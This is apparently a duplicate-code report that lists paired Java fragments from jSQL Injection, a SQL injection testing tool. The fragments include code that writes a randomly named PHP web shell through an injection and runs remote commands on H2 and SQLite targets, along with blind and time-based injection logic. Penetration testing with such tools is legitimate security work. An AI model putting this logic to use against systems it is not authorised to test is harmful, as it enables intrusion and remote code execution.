.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getFile().getWrite(),
nameTable,
nameTable, bodyExploit.replace("'", "\""),
nameTable, pathExploit + nameExploit
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { | |
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitSqlite.java | 81 |
| com/jsql/model/accessible/vendor/ExploitSqlite.java | 116 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty("exploit.web")
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameDbRandom = RandomStringUtils.secure().nextAlphabetic(8);
var nameTableRandom = RandomStringUtils.secure().nextAlphabetic(8);
var nameExploit = nameDbRandom + nameTableRandom +".php";
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getWriteFile(),
pathExploit + nameExploit, nameDbRandom,
nameDbRandom, nameTableRandom,
nameDbRandom, nameTableRandom, bodyExploit
), ResourceAccess.TBL_DUMP);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { | |
| File | Line |
|---|---|
| com/jsql/model/injection/strategy/StrategyBlindBin.java | 119 |
| com/jsql/model/injection/strategy/StrategyTime.java | 119 |
this.injectionModel.getMediatorVendor().getVendor().instance().sqlBlind(sqlQuery, startPosition, false),
stoppable
);
}
@Override
public void activateWhenApplicable() {
if (this.injectionModel.getMediatorStrategy().getStrategy() == null && this.isApplicable()) {
LOGGER.log(
LogLevelUtil.CONSOLE_INFORM,
"{} [{}] with [{}]",
() -> I18nUtil.valueByKey("LOG_USING_STRATEGY"),
this::getName,
() -> this.injection.getBlindOperator().name()
);
this.injectionModel.getMediatorStrategy().setStrategy(this);
var request = new Request();
request.setMessage(Interaction.MARK_BLIND_BIN_STRATEGY); | |
| File | Line |
|---|---|
| com/jsql/model/injection/strategy/StrategyBlindBit.java | 119 |
| com/jsql/model/injection/strategy/StrategyTime.java | 119 |
this.injectionModel.getMediatorVendor().getVendor().instance().sqlBlind(sqlQuery, startPosition, false),
stoppable
);
}
@Override
public void activateWhenApplicable() {
if (this.injectionModel.getMediatorStrategy().getStrategy() == null && this.isApplicable()) {
LOGGER.log(
LogLevelUtil.CONSOLE_INFORM,
"{} [{}] with [{}]",
() -> I18nUtil.valueByKey("LOG_USING_STRATEGY"),
this::getName,
() -> this.injection.getBlindOperator().name()
);
this.injectionModel.getMediatorStrategy().setStrategy(this);
var request = new Request();
request.setMessage(Interaction.MARK_BLIND_BIT_STRATEGY); | |
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitH2.java | 67 |
| com/jsql/model/accessible/vendor/ExploitSqlite.java | 64 |
this.modelYaml.getRce().getRunCmd(),
command.replace(StringUtils.SPACE, "%20")
), ResourceAccess.RUN_FUNC);
} catch (JSqlException e) {
result = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command);
}
var request = new Request();
request.setMessage(Interaction.GET_TERMINAL_RESULT);
request.setParameters(uuidShell, result.trim() +"\n"); // missing newline on some extensions
this.injectionModel.sendToViews(request);
return result;
}
public String createWeb(String pathExploit, String urlExploit) {
LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: stack query, web+db on same machine, jdbc bridge"); | |
| File | Line |
|---|---|
| com/jsql/model/injection/strategy/blind/callable/CallableBlindBin.java | 65 |
| com/jsql/model/injection/strategy/blind/callable/CallableBlindBit.java | 53 |
}
/**
* Check if a result page means the SQL query is true,
* confirm that nothing in the resulting page is also defined
* in the pages from every FALSE SQL queries.
* @return true if the current SQL query is true
*/
@Override
public boolean isTrue() {
// Fix #95426: ConcurrentModificationException on iterator.next()
List<Diff> falseDiffs = new CopyOnWriteArrayList<>(this.injectionBlind.getFalseDiffs());
for (Diff falseDiff: falseDiffs) { // ignored when false OR false => falsy empty
// Fix #4386: NullPointerException on contains(), diffsWithReference initialized to new LinkedList<>()
if (this.diffsWithReference.contains(falseDiff)) {
return false;
}
}
List<Diff> trueDiffs = new CopyOnWriteArrayList<>(this.injectionBlind.getTrueDiffs());
for (Diff trueDiff: trueDiffs) {
if (!this.diffsWithReference.contains(trueDiff)) { // required, set to false when empty falseDiffs
return false;
}
}
return true; // not in falseDiffs and in trueDiffs
}
/**
* Process the URL HTTP call, use function inject() from the model.
* Build the list of differences found between TRUE and the current page.
* @return Functional Blind Callable
*/
@Override
public CallableBlindBin call() { | |